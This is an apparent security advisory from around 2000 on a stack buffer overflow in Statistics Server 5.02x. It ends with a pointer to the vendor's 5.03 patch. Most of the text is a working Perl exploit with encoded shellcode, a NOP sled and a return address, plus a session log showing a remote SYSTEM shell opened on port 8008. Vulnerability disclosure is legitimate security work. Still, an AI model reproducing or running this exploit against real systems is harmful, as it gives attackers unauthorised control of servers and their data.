COMMAND

    Statistics Server

SYSTEMS AFFECTED

    Statistics Server 5.02x

PROBLEM

    |Zan and Nemo found the following.  'Statistics Server is far more
    than just another log analyzer.  It analyzes Web site traffic in
    "Real-time" and generates "Live Stats" reports in an easy to use
    Web interface.'

    'The ability of Statistics  Server to deliver Live  Web statistics
    for high volume installations  has made it an  essential component
    of many  corporate Internet  and Intranet  Web sites  and ISP  Web
    hosting installations.'

    Statistics Server 5.02x ships with a stack overflow in its web
    component that lets a local or remote user run arbitrary code
    inside the server process.  Tests, ideas and exploits were tried
    against the Win2k/Spanish version and the WinNT 4.0/sp6a Spanish
    version.  In a default installation the web server runs as a
    system service.

    The web server cannot handle long requests correctly.  When a long
    GET request (about 2033 bytes) is made, it dies with EIP
    overwritten, which lets an attacker run arbitrary code with the web
    server's privileges (system privileges by default).

    Exploit?  It spawns a remote winshell on port 8008.  It does not
    kill the web server, so the web server keeps running while the
    hack is made, and it continues to run normally after the hack is
    finished.

        $ lynx http://vulnerable.com

            Server Selection
            Please Enter Server ID _____________ GO

            ....

        $ ./ssexploit502x.pl vulnerable.com 80


        (c) Deep Zone - Statistics Server 5.02x's exploit

        Coded by |Zan - izan@deepzone.org

        -=[ http://www.deepzone.org - http://deepzone.cjb.net ]=-

        spawning remote shell on port 8008 ...

        HTTP/1.0 302
        Server: Statistics Server 5.0
        Location: /_XXXXXXXXX_http://XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

        ...    ...     ...     ...     ...     ...     ...

        Content-Type: text/html
        Connection: Keep-Alive
        Content-Lenght: 0

        ... done.

        $ lynx http://vulnerable.com            (It continues working }:)

            Server Selection
            Please Enter Server ID _____________ GO

            ....

        $ telnet vulnerable.com 8008

        Trying vulnerable.com...
        Connected to vulnerable.com.
        Escape character is '^]'.

        Microsoft Windows 2000 [Version 5.00.2195]
        (C) Copyright 1985-1999 Microsoft Corp.

        D:\StatisticsServer>

    The exploit works against Win2k/Statistics Server 5.02x running as
    a service.

    #!/usr/bin/perl -w
    # Statistics Server 5.02x's exploit.
    # usage: ./ssexploit502x.pl hostname port
    # 00/08/10
    # http://www.deepzone.org
    # http://deepzone.cjb.net
    # http://mareasvivas.cjb.net  (|Zan homepage)
    #
    # --|Zan <izan@deepzone.org>
    #
    # --------------------------------------------------------
    #
    # This exploit works against Statistics Server 5.02x/Win2k.
    #
    # Tested with Win2k (spanish version).
    #
    # It spawns a remote winshell on 8008 port. It doesn't kill
    # webserver so webserver continues running while hack is made.
    # When hack is finished webserver will run perfectly too.
    #
    # Default installation gives us a remote shell with system
    # privileges.
    #
    # overflow discovered by
    # -- Nemo <nemo@deepzone.org>
    #
    # exploit coded by
    # -- |Zan <izan@deepzone.org>
    #
    #
    # --------------------------------------------------------

    use IO::Socket;


    @crash = (
    "\x68","\x8b","\x41","\x1d","\x01","\x68","\x41","\x41","\x41",
    "\x41","\x68","\x61","\x41","\x41","\x41","\x58","\x59","\x5f",
    "\x2b","\xc1","\xaa","\x33","\xc9","\x66","\xb9","\x71","\x04",
    "\x90","\x90","\x90","\x68","\xbd","\x3e","\x1d","\x01","\x5e",
    "\x56","\x5f","\x33","\xd2","\x80","\xc2","\x99","\xac","\x32",
    "\xc2","\xaa","\xe2","\xfa","\x71","\x99","\x99","\x99","\x99",
    "\xc4","\x18","\x74","\xaf","\x89","\xd9","\x99","\x14","\x2c",
    "\xd4","\x8a","\xd9","\x99","\x14","\x24","\xcc","\x8a","\xd9",
    "\x99","\xf3","\x9e","\x09","\x09","\x09","\x09","\xc0","\x71",
    "\x4b","\x9b","\x99","\x99","\x14","\x2c","\x1c","\x8a","\xd9",
    "\x99","\x14","\x24","\x17","\x8a","\xd9","\x99","\xf3","\x93",
    "\x09","\x09","\x09","\x09","\xc0","\x71","\x23","\x9b","\x99",
    "\x99","\xf3","\x99","\x14","\x2c","\x8b","\x8d","\xd9","\x99",
    "\xcf","\x14","\x2c","\x87","\x8d","\xd9","\x99","\xcf","\x14",
    "\x2c","\xbb","\x8d","\xd9","\x99","\xcf","\x66","\x0c","\x17",
    "\x8a","\xd9","\x99","\xf3","\x99","\x14","\x2c","\x8b","\x8d",
    "\xd9","\x99","\xcf","\x14","\x2c","\xbf","\x8d","\xd9","\x99",
    "\xcf","\x14","\x2c","\xb3","\x8d","\xd9","\x99","\xcf","\x66",
    "\x0c","\x17","\x8a","\xd9","\x99","\x5e","\x1c","\xb7","\x8d",
    "\xd9","\x99","\xdd","\x99","\x99","\x99","\x14","\x2c","\xb7",
    "\x8d","\xd9","\x99","\xcf","\x66","\x0c","\x0b","\x8a","\xd9",
    "\x99","\x14","\x2c","\xff","\x8d","\xd9","\x99","\x34","\xc9",
    "\x66","\x0c","\x37","\x8a","\xd9","\x99","\x14","\x2c","\xf3",
    "\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x37","\x8a",
    "\xd9","\x99","\x14","\x2c","\xb3","\x8d","\xd9","\x99","\x14",
    "\x24","\xff","\x8d","\xd9","\x99","\x3c","\x14","\x2c","\x87",
    "\x8d","\xd9","\x99","\x34","\x14","\x24","\xf3","\x8d","\xd9",
    "\x99","\x32","\x14","\x24","\xf7","\x8d","\xd9","\x99","\x32",
    "\x5e","\x1c","\xc7","\x8d","\xd9","\x99","\x99","\x99","\x99",
    "\x99","\x5e","\x1c","\xc3","\x8d","\xd9","\x99","\x98","\x98",
    "\x99","\x99","\x14","\x2c","\xeb","\x8d","\xd9","\x99","\xcf",
    "\x14","\x2c","\xb7","\x8d","\xd9","\x99","\xcf","\xf3","\x99",
    "\xf3","\x99","\xf3","\x89","\xf3","\x98","\xf3","\x99","\xf3",
    "\x99","\x14","\x2c","\x1b","\x8d","\xd9","\x99","\xcf","\xf3",
    "\x99","\x66","\x0c","\x0f","\x8a","\xd9","\x99","\xf1","\x99",
    "\xb9","\x99","\x99","\x09","\xf1","\x99","\x9b","\x99","\x99",
    "\x66","\x0c","\x07","\x8a","\xd9","\x99","\x10","\x1c","\x13",
    "\x8d","\xd9","\x99","\xaa","\x59","\xc9","\xd9","\xc9","\xd9",
    "\xc9","\x66","\x0c","\xcc","\x8a","\xd9","\x99","\xc9","\xc2",
    "\xf3","\x89","\x14","\x2c","\x9b","\x8d","\xd9","\x99","\xcf",
    "\xca","\x66","\x0c","\xc0","\x8a","\xd9","\x99","\xf3","\x9a",
    "\xca","\x66","\x0c","\xc4","\x8a","\xd9","\x99","\x14","\x2c",
    "\x17","\x8d","\xd9","\x99","\xcf","\x14","\x2c","\x9b","\x8d",
    "\xd9","\x99","\xcf","\xca","\x66","\x0c","\xf8","\x8a","\xd9",
    "\x99","\x14","\x24","\x0b","\x8d","\xd9","\x99","\x32","\xaa",
    "\x59","\xc9","\x14","\x24","\x07","\x8d","\xd9","\x99","\xce",
    "\xc9","\xc9","\xc9","\x14","\x2c","\xbb","\x8d","\xd9","\x99",
    "\x34","\xc9","\x66","\x0c","\x03","\x8a","\xd9","\x99","\xf3",
    "\xa9","\x66","\x0c","\x33","\x8a","\xd9","\x99","\x72","\xd4",
    "\x09","\x09","\x09","\xaa","\x59","\xc9","\x14","\x24","\x07",
    "\x8d","\xd9","\x99","\xce","\xc9","\xc9","\xc9","\x14","\x2c",
    "\xbb","\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x03",
    "\x8a","\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a",
    "\xd9","\x99","\x1a","\x24","\x07","\x8d","\xd9","\x99","\x9b",
    "\x96","\x1b","\x8e","\x98","\x99","\x99","\x18","\x24","\x07",
    "\x8d","\xd9","\x99","\x98","\xb9","\x99","\x99","\xeb","\x97",
    "\x09","\x09","\x09","\x09","\x5e","\x1c","\x07","\x8d","\xd9",
    "\x99","\x99","\xb9","\x99","\x99","\xf3","\x99","\x12","\x1c",
    "\x07","\x8d","\xd9","\x99","\x14","\x24","\x07","\x8d","\xd9",
    "\x99","\xce","\xc9","\x12","\x1c","\x13","\x8d","\xd9","\x99",
    "\xc9","\x14","\x2c","\xbb","\x8d","\xd9","\x99","\x34","\xc9",
    "\x66","\x0c","\x3b","\x8a","\xd9","\x99","\xf3","\xa9","\x66",
    "\x0c","\x33","\x8a","\xd9","\x99","\x12","\x1c","\x07","\x8d",
    "\xd9","\x99","\xf3","\x99","\xc9","\x14","\x2c","\x13","\x8d",
    "\xd9","\x99","\x34","\xc9","\x14","\x2c","\x0b","\x8d","\xd9",
    "\x99","\x34","\xc9","\x66","\x0c","\xfc","\x8a","\xd9","\x99",
    "\xf3","\x99","\x14","\x24","\x07","\x8d","\xd9","\x99","\xce",
    "\xf3","\x99","\xf3","\x99","\xf3","\x99","\x14","\x2c","\xbb",
    "\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x03","\x8a",
    "\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a","\xd9",
    "\x99","\xaa","\x50","\xa0","\x14","\x07","\x8d","\xd9","\x99",
    "\x96","\x1e","\xfe","\x66","\x66","\x66","\xf3","\x99","\xf1",
    "\x99","\xb9","\x99","\x99","\x09","\x14","\x2c","\x13","\x8d",
    "\xd9","\x99","\x34","\xc9","\x14","\x2c","\x0b","\x8d","\xd9",
    "\x99","\x34","\xc9","\x66","\x0c","\xf0","\x8a","\xd9","\x99",
    "\x10","\x1c","\x03","\x8d","\xd9","\x99","\xf3","\x99","\x14",
    "\x24","\x07","\x8d","\xd9","\x99","\xce","\xc9","\x14","\x2c",
    "\x13","\x8d","\xd9","\x99","\x34","\xc9","\x14","\x2c","\xbf",
    "\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x3f","\x8a",
    "\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a","\xd9",
    "\x99","\xf3","\x99","\x12","\x1c","\x03","\x8d","\xd9","\x99",
    "\x14","\x24","\x07","\x8d","\xd9","\x99","\xce","\xc9","\x12",
    "\x1c","\x13","\x8d","\xd9","\x99","\xc9","\x14","\x2c","\xbb",
    "\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x3b","\x8a",
    "\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a","\xd9",
    "\x99","\x70","\x90","\x67","\x66","\x66","\x14","\x2c","\x0b",
    "\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\xf4","\x8a",
    "\xd9","\x99","\x14","\x2c","\x0f","\x8d","\xd9","\x99","\x34",
    "\xc9","\x66","\x0c","\xf4","\x8a","\xd9","\x99","\xf3","\x99",
    "\x66","\x0c","\x2b","\x8a","\xd9","\x99","\xc8","\xcf","\xf1",
    "\x6d","\x39","\xdc","\x99","\xc3","\x66","\x8b","\xc9","\xc2",
    "\xc0","\xce","\xc7","\xc8","\xcf","\xca","\xf1","\xe5","\x38",
    "\xdc","\x99","\xc3","\x66","\x8b","\xc9","\x35","\x1d","\x59",
    "\xec","\x62","\xc1","\x32","\xc0","\x7b","\x73","\x5a","\xce",
    "\xca","\xd6","\xda","\xd2","\xaa","\xab","\x99","\xea","\xf6",
    "\xfa","\xf2","\xfc","\xed","\x99","\xfb","\xf0","\xf7","\xfd",
    "\x99","\xf5","\xf0","\xea","\xed","\xfc","\xf7","\x99","\xf8",
    "\xfa","\xfa","\xfc","\xe9","\xed","\x99","\xea","\xfc","\xf7",
    "\xfd","\x99","\xeb","\xfc","\xfa","\xef","\x99","\xfa","\xf5",
    "\xf6","\xea","\xfc","\xea","\xf6","\xfa","\xf2","\xfc","\xed",
    "\x99","\xd2","\xdc","\xcb","\xd7","\xdc","\xd5","\xaa","\xab",
    "\x99","\xda","\xeb","\xfc","\xf8","\xed","\xfc","\xc9","\xf0",
    "\xe9","\xfc","\x99","\xde","\xfc","\xed","\xca","\xed","\xf8",
    "\xeb","\xed","\xec","\xe9","\xd0","\xf7","\xff","\xf6","\xd8",
    "\x99","\xda","\xeb","\xfc","\xf8","\xed","\xfc","\xc9","\xeb",
    "\xf6","\xfa","\xfc","\xea","\xea","\xd8","\x99","\xc9","\xfc",
    "\xfc","\xf2","\xd7","\xf8","\xf4","\xfc","\xfd","\xc9","\xf0",
    "\xe9","\xfc","\x99","\xde","\xf5","\xf6","\xfb","\xf8","\xf5",
    "\xd8","\xf5","\xf5","\xf6","\xfa","\x99","\xcb","\xfc","\xf8",
    "\xfd","\xdf","\xf0","\xf5","\xfc","\x99","\xce","\xeb","\xf0",
    "\xed","\xfc","\xdf","\xf0","\xf5","\xfc","\x99","\xca","\xf5",
    "\xfc","\xfc","\xe9","\x99","\xda","\xf5","\xf6","\xea","\xfc",
    "\xd1","\xf8","\xf7","\xfd","\xf5","\xfc","\x99","\xdc","\xe1",
    "\xf0","\xed","\xcd","\xf1","\xeb","\xfc","\xf8","\xfd","\x99",
    "\x9b","\x99","\x86","\xd1","\x99","\x99","\x99","\x99","\x99",
    "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x95","\x99",
    "\x99","\x99","\x99","\x99","\x99","\x99","\x98","\x99","\x99",
    "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
    "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
    "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
    "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
    "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
    "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
    "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
    "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
    "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
    "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
    "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
    "\x99","\x99","\xda","\xd4","\xdd","\xb7","\xdc","\xc1","\xdc",
    "\x99","\x99","\x99","\x99","\x99","\x89","\x99","\x99","\x99",
    "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
    "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x90","\x90");


    #
    # --------------------------------------------------------


    sub pcommands
    {
            die "usage: $0 hostname port\n" if (@ARGV != 2);
            ($host) = shift @ARGV;
            ($port) = shift @ARGV;
    }

    sub show_credits
    {
    print "\n\n\t (c) 2000 Deep Zone - Statistics Server 5.02x's";
    print "exploit\n\n\t\t  Coded by |Zan - izan\@deepzone.org\n";
    print "\n\t-=[ http://www.deepzone.org - http://deepzone.cjb";
    print ".net ]=-\n\n";
    }

    sub bofit
    {

            print "\nspawning remote shell on port 8008 ...\n\n";

            $s = IO::Socket::INET->new(PeerAddr=>$host,
                                       PeerPort=>$port,
                                       Proto=>"tcp");

            if(!$s) { die "error.\n"; }

            print $s "GET http://O";

            foreach $item (@crash) {
                    print $s $item
            }

            for ($cont=0; $cont<840;$cont++) {
                    print $s "\x90"
            }

            print $s "\x8c\x3e\x1d\x01";

            print $s "\r\n\r\n";

            while (<$s>) { print }

            print "... done.\n\n";

    }

    # ----- begin

    show_credits;
    pcommands;
    bofit;

    # ----- that's all :)

SOLUTION

    MediaHouse has created a 5.03 patch that corrects the Statistics
    Server (LiveStats) 5.02x memory overflow bug.  Additionally, 5.03
    addresses a problem in the mail engine with regard to Windows
    2000.  Log file management and server administration are more
    robust.  Download:

        http://www.mediahouse.com/statisticsserver/download_trial/dist/ss50.exe